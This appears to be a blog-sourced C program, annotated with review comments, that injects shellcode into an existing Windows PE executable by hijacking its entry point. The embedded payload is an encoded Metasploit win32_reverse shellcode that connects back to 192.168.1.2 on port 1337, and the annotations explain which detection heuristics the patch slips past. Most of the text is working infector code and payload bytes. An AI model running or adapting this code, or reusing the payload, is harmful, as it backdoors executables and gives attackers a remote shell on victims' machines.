
[C] Shellcode injection

#include
#include
/*
 * Patches an on-disk PE32 image in place: the first bytes at its entry point
 * are replaced by a jump into a stub written over the tail of section 0, and
 * the stub ends by re-executing the displaced entry bytes and jumping back.
 *
 * Layout written (all positions are file offsets):
 *   entry point       : E9 rel32 (jmp to stub) + NOP NOP              (7 bytes)
 *   end of section 0  : ShellCode | 7 saved entry bytes | E9 rel32 -> entry+5
 *
 * szFileName : path of an existing PE file, opened read/write and modified.
 * ShellCode  : nCodeSize bytes copied verbatim; the saved entry bytes only run
 *              if ShellCode falls through its last byte.
 * nCodeSize  : length of ShellCode in bytes.
 * Returns nothing and reports no failure (see the review notes below).
 *
 * NOTE(review): the two #include lines above lost their header names
 * (presumably angle brackets stripped by the blog's HTML); every name used
 * here (HANDLE, IMAGE_*_HEADER, CreateFile, ...) comes from <windows.h>.
 *
 * NOTE(review), for analysts: the file size, the section table and the
 * AddressOfEntryPoint field are left untouched - only the 7 bytes at the entry
 * point and the last nCodeSize+12 bytes of section 0's raw data change, so an
 * entry-point-field heuristic will not notice, while any hash or code-signing
 * check over the file will.
 */
void InsertShellCode(char *szFileName,BYTE* ShellCode,int nCodeSize)
{
/* Map the whole file read/write: every store through pFileStart reaches the
 * file once flushed. None of the three results is checked - a missing or
 * read-only file gives INVALID_HANDLE_VALUE / NULL here and a crash below. */
HANDLE hFile = CreateFile(szFileName,GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
HANDLE hMap = CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,0,NULL);
BYTE* pFileStart = (BYTE*)MapViewOfFile(hMap,FILE_MAP_ALL_ACCESS,0,0,0);

/* Walk to the PE headers via e_lfanew: +4 skips the "PE\0\0" signature,
 * +24 = 4 + sizeof(IMAGE_FILE_HEADER), and +248 = 24 + 224 hard-codes a
 * PE32-sized optional header. pFileHeader is assigned but never read, and
 * e_lfanew is not validated against the mapping size. */
IMAGE_DOS_HEADER* pDosHeader = (IMAGE_DOS_HEADER*)pFileStart;
IMAGE_FILE_HEADER* pFileHeader = (IMAGE_FILE_HEADER *)(pFileStart + pDosHeader->e_lfanew + 4);
IMAGE_OPTIONAL_HEADER* pOptionalHeader = (IMAGE_OPTIONAL_HEADER*)(pFileStart + pDosHeader->e_lfanew + 24);
IMAGE_SECTION_HEADER* pSectionHeader = (IMAGE_SECTION_HEADER*)(pFileStart + pDosHeader->e_lfanew + 248);

/* Stub size = payload + 7 saved entry bytes + 5-byte jump back. */
nCodeSize += 12;

/* Entry RVA -> file offset using section 0's raw/virtual delta, i.e. the
 * entry point is assumed to lie in section 0. The stub occupies the last
 * nCodeSize bytes of section 0's raw data; nothing verifies those bytes are
 * unused padding or that the section is at least nCodeSize bytes long. */
DWORD dwEntryPointRVA = pOptionalHeader->AddressOfEntryPoint;
DWORD dwEntryPointFileOffset = dwEntryPointRVA +(pSectionHeader[0].PointerToRawData)-(pSectionHeader[0].VirtualAddress);
DWORD dwCodePos = pSectionHeader[0].PointerToRawData + pSectionHeader[0].SizeOfRawData - nCodeSize;

/* 7-byte detour for the entry point: E9 rel32, NOP, NOP. rel32 is
 * target - (jmp + 5); using file offsets for both ends is only valid because
 * both lie in section 0 and share one raw/virtual delta.
 * Review: the DWORD store into a BYTE array is an alignment/strict-aliasing
 * violation; memcpy is the well-defined form. Same on the bjmp line. */
BYTE jmp[7] = {0xE9,0x00,0x00,0x00,0x00,0x90,0x90};
*(DWORD*)(jmp + 1) = dwCodePos - dwEntryPointFileOffset - 5;
/* Jump back from the end of the stub (dwCodePos + nCodeSize) to entry+5,
 * i.e. onto the two NOPs that follow the detour. */
BYTE bjmp[5] = {0xE9};
*(DWORD*)(bjmp + 1) = (dwEntryPointFileOffset + 5) - ( dwCodePos + nCodeSize);

/* The 7 entry bytes the detour overwrites. They are re-executed from the
 * stub without any disassembly, so this is only correct when an instruction
 * boundary falls exactly at byte 7 and none of those instructions is
 * position-dependent - the usual reason such patches crash the target. */
BYTE save[7];

for (int i = 0; i < 7; i++)
{
save[i] = pFileStart[dwEntryPointFileOffset+i];
}

/* Install the detour at the entry point. */
for (int i = 0; i < 7; i++)
{
pFileStart[dwEntryPointFileOffset+i] = jmp[i];
}

/* Stub part 1: the payload (nCodeSize - 12 is the caller's length). */
for (int i = 0; i < (nCodeSize - 12); i++)
{
pFileStart[dwCodePos+i] = ShellCode[i];
}

int j = 0;

/* Stub part 2: the 7 saved entry bytes. */
for (int i = (nCodeSize - 12);i < (nCodeSize - 5); i++)
{
pFileStart[dwCodePos+i] = save[j];
j++;
}

int k = 0;

/* Stub part 3: the 5-byte jump back to entry+5. */
for (int i = (nCodeSize - 5);i < nCodeSize; i++)
{
pFileStart[dwCodePos+i] = bjmp[k];
k++;
}
/* Commit the view to disk and release the mapping.
 * Review: hMap is closed twice and hFile never - the second call operates
 * on an already-closed handle and the file handle leaks until exit; the
 * intended line is CloseHandle(hFile). */
FlushViewOfFile(pFileStart,0);
UnmapViewOfFile(pFileStart);
CloseHandle(hMap);
CloseHandle(hMap);
}
/* Demo driver: embeds a Metasploit-generated payload (the generator line
 * below records its type and hard-coded LHOST/LPORT) and patches it into
 * "malloc.exe", resolved relative to the current directory.
 * Review: sizeof(myshell) counts the string literal's terminating NUL, so
 * 313 bytes are copied into the stub, not the 312 the generator comment
 * states. InsertShellCode reports no failure, so there is nothing for main
 * to check; falling off the end of main yields 0 under C99. */
int main(){
BYTE myshell[] =//* win32_reverse - EXITFUNC=thread LHOST=192.168.1.2 LPORT=1337 Size=312 Encoder=PexFnstenvSub http://metasploit.com */
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6e"
"\x67\x32\x0c\x83\xeb\xfc\xe2\xf4\x92\x0d\xd9\x41\x86\x9e\xcd\xf3"
"\x91\x07\xb9\x60\x4a\x43\xb9\x49\x52\xec\x4e\x09\x16\x66\xdd\x87"
"\x21\x7f\xb9\x53\x4e\x66\xd9\x45\xe5\x53\xb9\x0d\x80\x56\xf2\x95"
"\xc2\xe3\xf2\x78\x69\xa6\xf8\x01\x6f\xa5\xd9\xf8\x55\x33\x16\x24"
"\x1b\x82\xb9\x53\x4a\x66\xd9\x6a\xe5\x6b\x79\x87\x31\x7b\x33\xe7"
"\x6d\x4b\xb9\x85\x02\x43\x2e\x6d\xad\x56\xe9\x68\xe5\x24\x02\x87"
"\x2e\x6b\xb9\x7c\x72\xca\xb9\x4c\x66\x39\x5a\x82\x20\x69\xde\x5c"
"\x91\xb1\x54\x5f\x08\x0f\x01\x3e\x06\x10\x41\x3e\x31\x33\xcd\xdc"
"\x06\xac\xdf\xf0\x55\x37\xcd\xda\x31\xee\xd7\x6a\xef\x8a\x3a\x0e"
"\x3b\x0d\x30\xf3\xbe\x0f\xeb\x05\x9b\xca\x65\xf3\xb8\x34\x61\x5f"
"\x3d\x24\x61\x4f\x3d\x98\xe2\x64\xae\xcf\x33\x0e\x08\x0f\x37\x35"
"\x08\x34\xbb\xed\xfb\x0f\xde\xf5\xc4\x07\x65\xf3\xb8\x0d\x22\x5d"
"\x3b\x98\xe2\x6a\x04\x03\x54\x64\x0d\x0a\x58\x5c\x37\x4e\xfe\x85"
"\x89\x0d\x76\x85\x8c\x56\xf2\xff\xc4\xf2\xbb\xf1\x90\x25\x1f\xf2"
"\x2c\x4b\xbf\x76\x56\xcc\x99\xa7\x06\x15\xcc\xbf\x78\x98\x47\x24"
"\x91\xb1\x69\x5b\x3c\x36\x63\x5d\x04\x66\x63\x5d\x3b\x36\xcd\xdc"
"\x06\xca\xeb\x09\xa0\x34\xcd\xda\x04\x98\xcd\x3b\x91\xb7\x5a\xeb"
"\x17\xa1\x4b\xf3\x1b\x63\xcd\xda\x91\x10\xce\xf3\xbe\x0f\xdd\xc2"
"\x8e\x07\x61\xf3\xb8\x98\xe2\x0c";
/* Payload length passed as the array size (includes the trailing NUL). */
InsertShellCode("malloc.exe",myshell,sizeof(myshell));
}

